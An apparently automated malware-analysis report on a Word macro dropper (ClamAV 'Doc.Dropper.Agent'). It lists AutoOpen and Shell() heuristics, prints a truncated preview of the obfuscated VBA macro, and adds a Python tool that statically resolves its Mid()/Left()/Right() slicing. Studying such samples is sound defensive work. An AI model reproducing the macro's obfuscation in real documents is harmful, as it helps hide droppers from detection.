Verdict: MALICIOUS
Risk Score: 202
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document carrying a VBA macro with an AutoOpen entry point, so the code runs as soon as the document is opened with macros enabled (T1204.002 Malicious File covers the user action of opening it). The macro calls Shell(), i.e. it spawns an external process; that is the usual hand-off from a macro dropper to a downloaded or embedded second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6348861-0' supports the dropper classification. The recovered source (macros.bas, below) is heavily obfuscated: random-named variables are filled with long string literals that are then sliced with Mid(), and a blob returned by a routine ChVAicZMJ() that is not shown in the preview is carved at fixed offsets with Mid(), Left() and Right(). Many of the intermediate variables are not read anywhere in the visible portion, consistent with junk code inserted to defeat signature matching. The Shell() call itself lies beyond the truncated preview, so the exact command line and any download location are not visible in this report.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6348861-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6348861-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's generic wording does not fit the rest of the report: a VBA project was recovered (see the VBA macros and AutoOpen findings and the extracted macros.bas), so read it only as the legacy marker being present alongside the modern macro.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard XML namespace of Office DrawingML and appears in ordinary documents; it is not a network indicator and should not be blocked or hunted on.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10825 bytes | dccf1e5a2cf9ee7538e2e38f7a234c099dd3697120e3ebddac029411febb1c9f |
Preview script (first 1,000 lines of the extracted script; the copy on this page is cut off at the end)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub PPjhodSdk()
AMbbEuM = "1QtPZcqaPkcYRYUBCjLLanjzQwLdrsMHwjGZRPmjPPzcNZ1HM53ALDI41JUUQAAMPA8Q"
MfYhZsNNa = Mid(AMbbEuM, 2, 44)
IScBQjXjtUm = MfYhZsNNa
wXHiYU = "7OX1QVicCBPmiVkjvwdRNjXYVZkSujmtBQOP6WTV3"
BRswv = Mid(wXHiYU, 5, 28)
EYBrsGNkoZM = BRswv
OmbGjMpTYi = "0BIRVE4CUtkMVoftNUvXAiLSRWVVDtwtFRviXLwhvsJJlKOFjOYofiENIPVhLjwbwrGDtBVBWNbQ253E0"
LvqaKzvY = Mid(OmbGjMpTYi, 8, 68)
REdPTwiZfPP = LvqaKzvY
cNEXuNLqRR = "HB14RcvKoHjzbjAoqwUULBS0KY"
KILnidP = Mid(cNEXuNLqRR, 6, 16)
JSXjZrcziP = KILnidP
RQhanJljV = "L8SKmApjEK310GJUJV5LRA30NNKOHJW"
hnRkVGsn = Mid(RQhanJljV, 5, 4)
XDnvwRN = hnRkVGsn
ZZwSGo = "QNEBUBAH2XJTZOMSJDRKMKvqOAwDUrjiwLWJYuMOpoGOkLfFTHWrwFwV81ORHB23"
YmVTju = Mid(ZZwSGo, 22, 34)
PGwURAHOwM = YmVTju
polMRH = "2TS95F5FjEu7REG"
kZzzfICh = Mid(polMRH, 9, 3)
KdmNV = kZzzfICh
iFnLAfas = "UFBBO325TQMBWDTURW8QHOBuiCWXjtOHlIaBEwUhmEjFS3"
pWihVdf = Mid(iFnLAfas, 22, 23)
OLYAa = pWihVdf
iBVnwzzbDjH = "MB4K9ODQ4UPXEHZCjGHPmpVIObNiVIqQWMuiMuDKMitWSRCzoGiOaQ8AFW374G"
BwrXo = Mid(iBVnwzzbDjH, 14, 40)
PUZOnOwcDrl = BwrXo
XjDXUNH = "HYKBGNJ356BNFQNB6C14"
TuIqmkaSzz = Mid(XjDXUNH, 18, 1)
YwGFJt = TuIqmkaSzz
BpQWkml = "TAAQT0AHDvwJFodfqKfMLGqPNqpmDwDEwwqwYJZ31A6B"
fTWRdt = Mid(BpQWkml, 10, 28)
IhDAaBGwq = fTWRdt
hWbaKT = "NZ5LT3AVtVRJSCjcEsrkLhSPWKiKwZMwCkMuhbAFYzBOVjKsiLCrIqVSVaaJmAYTJSHhqmudrlMOOO0NKKR"
AWnpzzNvta = Mid(hWbaKT, 8, 69)
HBQrqm = AWnpzzNvta
rJiAarbZt = "" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + "com" + "ments" + jRGPEu + RmVfm + lmdnthw + CWBiW + qiffMX + DLvAUEY + TsBfP + wSHYI + juFhhi + mHqTO + hainZcZw + iACHGuL + GDBQWR + SmaNRLBi + TbVkTz + vVwQFia + YGArTYYh
kwiFo = Right(Left((ChVAicZMJ(rJiAarbZt)), 9951), 5)
TGaSfjirck = Mid((ChVAicZMJ(rJiAarbZt)), 11394, 89)
hJMjFvN = Mid((ChVAicZMJ(rJiAarbZt)), 10167, 119)
IciEJd = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 749), 123)
GVJBGtim = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 352), 135)
MRtNjKUJwYO = Mid((ChVAicZMJ(rJiAarbZt)), 9750, 103)
bscKiw = Right(Left((ChVAicZMJ(rJiAarbZt)), 14384), 149)
FlSWOUUa = Right(Left((ChVAicZMJ(rJiAarbZt)), 7570), 76)
zVwARPvvU = Right(Left((ChVAicZMJ(rJiAarbZt)), 6176), 140)
hUKdLhIdiDp = Mid((ChVAicZMJ(rJiAarbZt)), 11245, 108)
HjarRpAj = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 12719), 26)
QGOaaMPjciX = Mid((ChVAicZMJ(rJiAarbZt)), 12976, 15)
HsDnLwh = Right(Left((ChVAicZMJ(rJiAarbZt)), 343), 100)
zUskpD = Mid((ChVAicZMJ(rJiAarbZt)), 9407, 117)
jPAauWwHh = Right(Left((ChVAicZMJ(rJiAarbZt)), 6464), 32)
UNsEjQS = Mid((ChVAicZMJ(rJiAarbZt)), 7429, 22)
ComzTJ = Right(Left((ChVAicZMJ(rJiAarbZt)), 4780), 57)
hqXMFzuIXpN = Mid((ChVAicZMJ(rJiAarbZt)), 1679, 81)
fdfOG = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 14071), 135)
QJUWE = Mid((ChVAicZMJ(rJiAarbZt)), 4984, 119)
ucBHkPDZ = Right(Left((ChVAicZMJ(rJiAarbZt)), 5611), 76)
HOPzvMaEdHW = Mid((ChVAicZMJ(rJiAarbZt)), 939, 28)
kMOAcY = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 9917), 25)
HqVzf = Mid((ChVAicZMJ(rJiAarbZt)), 1803, 139)
cGCGllHrf = Right(Left((ChVAicZMJ(rJiAarbZt)), 8880), 91)
wtRaIGj = Mid((ChVAicZMJ(rJiAarbZt)), 569, 132)
vWObAWt = Mid((ChVAicZMJ(rJiAarbZt)), 11968, 66)
uzQrtcXE = Mid((ChVAicZMJ(rJiAarbZt)), 3715, 91)
VdUjqHcb = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 3500), 40)
hPQKEmGrb = Mid((ChVAicZMJ(rJiAarbZt)), 6922, 121)
sHTlLEE = Mid((ChVAicZMJ(rJiAarbZt)), 7192, 69)
DDqKznamYT = Left(Right((ChVAicZMJ(rJiAarbZt)), Len((ChVAicZMJ(rJiAarbZt))) - 6470), 75)
KSqihFnGVjc = Right(Left((ChVAicZMJ(rJiAarbZt)), 14607), 138)
dVBwiD = Mid((ChVAicZMJ(rJiAarbZt)), 10314, 71)
sdiY ... (truncated)
```
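The slicing in the preview (Mid() over long literals, Left()/Right()/Len() arithmetic over whatever ChVAicZMJ() returns, aliases that are never read again) can be resolved statically without opening the document. The following is an added example, not code from the analyzer or from oletools: a small evaluator for exactly that VBA subset that reports what each variable resolves to, which statements depend on a routine the source does not define, and which assignments are dead. The sample statements are copied from the preview; the `tailDemo` line and the cut-down `rJiAarbZt` line are constructed, and the feeder variables of `rJiAarbZt` (jRGPEu, RmVfm, GDBQWR) are assumed to be never assigned, as in the preview, in which case VBA's `+` treats them as Empty and the string collapses to "comments".

```python
"""Emulate the Mid()/Left()/Right() string-slicing obfuscation used in the extracted
macro and flag junk assignments that nothing reads back. Added example for this
report; it is not code from the analyzer or from oletools."""
import re

# Constructed sample: statements copied from the macros.bas preview on this page plus
# two hypothetical ones (tailDemo, and rJiAarbZt cut down to three of its feeders). The
# feeders are never assigned and ChVAicZMJ is not on the page, so kwiFo stays unresolved.
SAMPLE_VBA = """
AMbbEuM = "1QtPZcqaPkcYRYUBCjLLanjzQwLdrsMHwjGZRPmjPPzcNZ1HM53ALDI41JUUQAAMPA8Q"
MfYhZsNNa = Mid(AMbbEuM, 2, 44)
IScBQjXjtUm = MfYhZsNNa
polMRH = "2TS95F5FjEu7REG"
kZzzfICh = Mid(polMRH, 9, 3)
rJiAarbZt = "" + jRGPEu + RmVfm + "com" + "ments" + GDBQWR
tailDemo = Left(Right(polMRH, Len(polMRH) - 10), 3)
kwiFo = Right(Left((ChVAicZMJ(rJiAarbZt)), 9951), 5)
"""

STRING = r'"(?:[^"]|"")*"'
TOKEN_RE = re.compile(STRING + r'|\d+|[A-Za-z_]\w*|[()+\-,]')
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.M)
REF_RE = re.compile(r'\b([A-Za-z_]\w*)\b(?!\s*\()')  # names read as variables, not called

class Unresolved(Exception): pass  # the expression depends on something the sample lacks

def text(v):
    return '' if v is None else str(v)  # VBA coerces Empty to "" in string context

class VbaStringEmulator:
    def __init__(self):
        self.vars, self.unresolved, self.assigned, self.referenced = {}, {}, [], set()

    def run(self, source):
        for name, expr in ASSIGN_RE.findall(source):  # only "name = expr" lines are modelled
            self.assigned.append(name)
            self.referenced.update(REF_RE.findall(re.sub(STRING, '', expr)))
            self.toks = TOKEN_RE.findall(expr)
            try:
                if ''.join(self.toks) != re.sub(r'\s+', '', expr):
                    raise Unresolved('unsupported syntax')
                self.vars[name] = self.expr()
            except Unresolved as e:
                self.unresolved[name] = str(e)
        return self

    def dead_vars(self):
        return [v for v in self.assigned if v not in self.referenced]  # assigned, never read

    def expr(self):
        val = self.term()
        while self.toks and self.toks[0] in ('+', '-'):
            val = self.apply(self.toks.pop(0), val, self.term())
        return val

    def term(self):
        tok = self.toks.pop(0) if self.toks else None
        if tok is None:
            raise Unresolved('unexpected end of expression')
        if tok.startswith('"'):
            return tok[1:-1].replace('""', '"')
        if tok.isdigit():
            return int(tok)
        if tok == '(' or self.toks[:1] == ['(']:  # parenthesised expression or function call
            args = []
            if tok != '(':
                self.toks.pop(0)  # the '(' after a function name
            while self.toks[:1] != [')']:
                args.append(self.expr())
                if self.toks[:1] == [',']:
                    self.toks.pop(0)
            self.toks.pop(0)  # the closing ')'
            return args[0] if tok == '(' else self.call(tok, args)
        if tok in self.unresolved:
            raise Unresolved(f'{tok} depends on {self.unresolved[tok]}')
        return self.vars.get(tok)  # never-assigned name: Variant Empty, modelled as None

    def apply(self, op, a, b):
        if op == '-':
            return (a or 0) - (b or 0)
        if a is None or b is None:  # '+' with one Empty operand returns the other unchanged
            return a if b is None else b
        return text(a) + text(b) if isinstance(a, str) or isinstance(b, str) else a + b

    def call(self, name, args):
        fn = name.lower()
        if fn == 'mid':  # VBA Mid() is 1-indexed
            s, start = text(args[0]), args[1]
            return s[start - 1:start - 1 + (args[2] if len(args) > 2 else len(s))]
        if fn == 'left':
            return text(args[0])[:args[1]]
        if fn == 'right':
            return text(args[0])[-args[1]:] if args[1] > 0 else ''
        if fn == 'len':
            return len(text(args[0]))
        raise Unresolved(f'call to {name}() not defined in the sample')

def emulate(source=SAMPLE_VBA):
    emu = VbaStringEmulator().run(source)
    return {'values': emu.vars, 'unresolved': emu.unresolved, 'dead': emu.dead_vars()}
```

Run it over the full extracted module with `emulate(open('macros.bas').read())`. Everything listed under `unresolved` depends on a routine such as ChVAicZMJ() that has to be read by hand or emulated separately; the offsets used against its result in the preview (a Left() of 14607 characters followed by a Right() of 138) imply a decoded blob of at least about 14.6 KB, which is where the payload or the Shell() command line is most likely assembled. The `dead` list shows how much of the module is padding, and the guard in `run()` turns any syntax outside the modelled subset into an unresolved statement instead of silently skipping characters.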